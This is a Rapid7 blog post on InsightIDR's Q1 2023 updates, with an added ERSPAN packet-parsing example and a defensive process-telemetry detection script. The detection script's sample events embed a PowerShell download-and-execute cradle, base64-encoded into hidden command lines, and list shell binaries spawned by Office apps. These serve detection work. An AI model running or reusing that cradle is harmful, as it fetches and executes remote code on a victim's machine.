Last updated at Wed, 03 May 2023 12:59:01 GMT
InsightIDR received a number of updates in Q1 2023, including faster Log Search, a redesigned UI, an investigation audit log and new investigation states, ERSPAN support for the Insight Network Sensor, Enhanced Endpoint Telemetry, and more.
In our effort to empower practitioners to feel confident in their detection and response capabilities, we focused on functionality that accelerates investigation and response time. Below you will find key launches and enhancements from the last three months.
Augmented Practitioner Log Search Experience: Faster Search Capabilities & Redesigned UI
The redesigned Log Search loads selected log sets 3x faster than before and adds:
- Easier sharing and analysis of Log Search queries.
- Customizable views of log data: Table View, JSON format, and Condensed format.
Learn more about the improved Log Search here.
Increased Visibility, More Coverage with Updated Investigations Functionality
InsightIDR now provides more visibility into the actions taken during an investigation. The investigation audit log records each update made to an investigation, when it was made, and which user made it. These audit events are also searchable in Log Search as part of the Audit Logs log set, so teams can query investigation activity alongside other audit data.
To learn more about Viewing the Audit Log click here.
Additionally, two new options have been added to Investigations so practitioners can describe an investigation's current state more accurately: a Waiting status and an Unknown disposition. Teams can:
- Use the Waiting status to indicate that the investigation is pending while more information is gathered.
- Use the Unknown disposition to indicate that the maliciousness of the activity under investigation could not be determined.
Understand Traffic data via VLANs or Ports with ERSPAN Support for Insight Network Sensor
Security teams can now use Encapsulated Remote SPAN (ERSPAN) with the Insight Network Sensor to mirror traffic associated with one or more VLANs or ports. When configured, the switch encapsulates the mirrored frames in GRE and sends them to the Sensor over IP. This lets teams deploy a Sensor on whatever platform they want and still receive a copy of network traffic from a crucial network location such as a core switch. Because the mirrored traffic is routed rather than delivered over a directly attached SPAN port, the switch needs an IP path to the Sensor, and each mirrored frame grows by the outer IP, GRE, and ERSPAN headers, which can push full-size frames past the path MTU. Practitioners can enable ERSPAN on a per-Sensor basis from the Sensor Management page.
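To make concrete what arrives at the Sensor's IP interface when ERSPAN is enabled, the following is an added example (not Rapid7 code, and not how the Insight Network Sensor is implemented) that decapsulates an ERSPAN Type II packet: outer IPv4, GRE with protocol type 0x88BE and a sequence number, the 8-byte ERSPAN header carrying the session ID and VLAN, and finally the original Ethernet frame. The sample packet, MAC addresses, IP addresses, and session ID are constructed for the example; the helper `build_erspan_packet` only exists to produce that input.

```python
"""ERSPAN Type II decapsulation: walk IPv4 -> GRE -> ERSPAN -> inner Ethernet."""
import struct
from dataclasses import dataclass

IP_PROTO_GRE = 47
GRE_PROTO_ERSPAN_II = 0x88BE   # GRE protocol type that carries ERSPAN Type II
ETHERTYPE_8021Q = 0x8100


@dataclass
class ErspanFrame:
    session_id: int   # ERSPAN session the switch tagged this frame with
    vlan: int         # VLAN from the ERSPAN header, or from a preserved 802.1Q tag
    dst_mac: str
    src_mac: str
    ethertype: int    # ethertype of the mirrored frame after any 802.1Q tag
    payload: bytes    # mirrored frame payload (for example an IPv4 packet)


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_erspan_ipv4(pkt: bytes) -> ErspanFrame:
    """Decapsulate one ERSPAN Type II packet as seen on the sensor's IP interface."""
    # Outer IPv4 header: the protocol field must be GRE (47).
    if pkt[0] >> 4 != 4:
        raise ValueError("outer packet is not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != IP_PROTO_GRE:
        raise ValueError(f"outer protocol {pkt[9]} is not GRE")
    off = ihl

    # GRE header: 2 bytes flags/version, 2 bytes protocol type, then optional fields.
    flags, gre_proto = struct.unpack_from("!HH", pkt, off)
    off += 4
    if gre_proto != GRE_PROTO_ERSPAN_II:
        raise ValueError(f"GRE protocol 0x{gre_proto:04x} is not ERSPAN Type II")
    if flags & 0x8000:          # C bit: checksum + reserved1
        off += 4
    if flags & 0x2000:          # K bit: key
        off += 4
    if not flags & 0x1000:      # S bit: ERSPAN Type II always carries a sequence number
        raise ValueError("ERSPAN Type II requires the GRE sequence number")
    off += 4

    # ERSPAN Type II header (8 bytes):
    #   word 1: Ver(4) | VLAN(12) | COS(3) | En(2) | T(1) | Session ID(10)
    #   word 2: Reserved(12) | Index(20)
    word1, _word2 = struct.unpack_from("!II", pkt, off)
    off += 8
    if word1 >> 28 != 1:
        raise ValueError(f"ERSPAN version {word1 >> 28} is not Type II")
    vlan = (word1 >> 16) & 0x0FFF
    encap = (word1 >> 11) & 0x3
    session_id = word1 & 0x3FF

    # Inner Ethernet frame, exactly as the monitored port saw it.
    dst, src = pkt[off:off + 6], pkt[off + 6:off + 12]
    ethertype = struct.unpack_from("!H", pkt, off + 12)[0]
    off += 14
    if ethertype == ETHERTYPE_8021Q:
        # En == 0b11 signals that the original 802.1Q tag was preserved in the
        # mirrored frame; in that case take the VLAN from the tag itself.
        tci, ethertype = struct.unpack_from("!HH", pkt, off)
        off += 4
        if encap == 0b11:
            vlan = tci & 0x0FFF
    return ErspanFrame(session_id, vlan, _mac(dst), _mac(src), ethertype, pkt[off:])


def build_erspan_packet(session_id: int, vlan: int, inner_frame: bytes,
                        src_ip=b"\x0a\x00\x00\x01", dst_ip=b"\x0a\x00\x00\x02",
                        seq=1) -> bytes:
    """Constructed input: what a switch would emit for one mirrored frame (IP checksum left 0)."""
    word1 = (1 << 28) | (vlan << 16) | (0b10 << 11) | session_id   # Ver=1, COS=0, En=802.1Q, T=0
    erspan = struct.pack("!II", word1, 0)
    gre = struct.pack("!HHI", 0x1000, GRE_PROTO_ERSPAN_II, seq)   # S bit + sequence number
    total_len = 20 + len(gre) + len(erspan) + len(inner_frame)
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64,
                       IP_PROTO_GRE, 0, src_ip, dst_ip)
    return ipv4 + gre + erspan + inner_frame


# Constructed sample: an IPv4 frame from 00:11:22:33:44:55 to 66:77:88:99:aa:bb mirrored on VLAN 100.
SAMPLE_INNER = bytes.fromhex("66778899aabb" "001122334455" "0800") + b"\x45\x00\x00\x14" + b"\x00" * 16
SAMPLE_PACKET = build_erspan_packet(session_id=5, vlan=100, inner_frame=SAMPLE_INNER)

if __name__ == "__main__":
    frame = parse_erspan_ipv4(SAMPLE_PACKET)
    print(f"session {frame.session_id} vlan {frame.vlan} "
          f"{frame.src_mac} -> {frame.dst_mac} ethertype 0x{frame.ethertype:04x}")
```

Reading the session ID and VLAN out of the ERSPAN header is the quickest way to confirm that the switch-side session and the Sensor-side configuration agree: if the parser sees traffic from an unexpected session or VLAN, the mirror is attached to the wrong source, regardless of what the inner frames contain.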
Enriched Endpoint Response with Enhanced Endpoint Telemetry (EET) Data
InsightIDR customers can now use Enhanced Endpoint Telemetry (EET), the process start metadata captured by the Insight Agent, to create custom detections, accelerate investigations, and respond with greater precision. InsightIDR Advanced customers have a 7-day view of this data; InsightIDR Ultimate customers have a 13-month view.
Learn more about the Enhanced Endpoint Telemetry release here.
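As an illustration of the kind of custom detection that process start metadata enables, here is an added example that is not Rapid7 code and does not use the InsightIDR EET schema or query language. The event dictionaries, field names (`hostname`, `parent_name`, `process_name`, `cmd_line`), and sample events are constructed for the example. It runs two rules that only work when the parent process and full command line are recorded at process start: an Office application spawning a shell or script host, and PowerShell launched with an encoded command, which the rule decodes so the analyst sees the actual script rather than a base64 blob.

```python
"""Sample detections over process-start telemetry.

The event dicts and field names below are constructed for this example; they are
not the InsightIDR EET schema or its query language.
"""
import base64
import re
from dataclasses import dataclass

# Parent/child pairs that rarely occur legitimately on user endpoints.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common spellings.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class Alert:
    rule: str
    hostname: str
    process: str
    detail: str


def decode_encoded_command(cmd_line: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    match = ENCODED_FLAG.search(cmd_line)
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Bad padding, non-alphabet characters or an odd byte count: not a real encoded command.
        return None


def evaluate(event: dict) -> list:
    """Run both rules against one process-start event and return any alerts."""
    alerts = []
    parent = event["parent_name"].lower()
    proc = event["process_name"].lower()
    if parent in OFFICE_PARENTS and proc in SHELLS:
        alerts.append(Alert("office-app-spawns-shell", event["hostname"], proc,
                            f"{parent} -> {proc}: {event['cmd_line']}"))
    if proc in POWERSHELL:
        decoded = decode_encoded_command(event["cmd_line"])
        if decoded is not None:
            alerts.append(Alert("powershell-encoded-command", event["hostname"], proc, decoded))
    return alerts


def run_detections(events) -> list:
    return [alert for event in events for alert in evaluate(event)]


# Constructed sample events (hostnames, command lines and the URL are made up).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_SCRIPT = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"hostname": "ws01", "parent_name": "explorer.exe", "process_name": "chrome.exe",
     "cmd_line": "chrome.exe --profile-directory=Default"},
    {"hostname": "ws01", "parent_name": "WINWORD.EXE", "process_name": "cmd.exe",
     "cmd_line": "cmd.exe /c whoami"},
    {"hostname": "ws02", "parent_name": "explorer.exe", "process_name": "powershell.exe",
     "cmd_line": f"powershell.exe -NoP -W Hidden -enc {ENCODED_SCRIPT}"},
    {"hostname": "ws03", "parent_name": "EXCEL.EXE", "process_name": "powershell.exe",
     "cmd_line": f"powershell.exe -EncodedCommand {ENCODED_SCRIPT}"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.hostname} {alert.process}: {alert.detail}")
```

Both rules depend on fields that only process start telemetry provides: the parent process name for the first, and the complete command line for the second. Decoding the encoded command inside the detection, rather than leaving it to the analyst, is what turns the second rule from a noisy "encoded PowerShell seen" alert into one that states what the script does.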
Stay tuned!
Rapid7 provides organizations the world's only practitioner-first security solutions. Each product, including InsightIDR, is purpose-built by practitioners, for practitioners, to ensure teams achieve elevated outcomes without compromise.
We’re always working on new product enhancements and functionality to ensure teams can stay ahead of potential threats and malicious activity. Keep an eye on the Rapid7 blog and the InsightIDR release notes to keep up to date with the latest detection and response releases at Rapid7.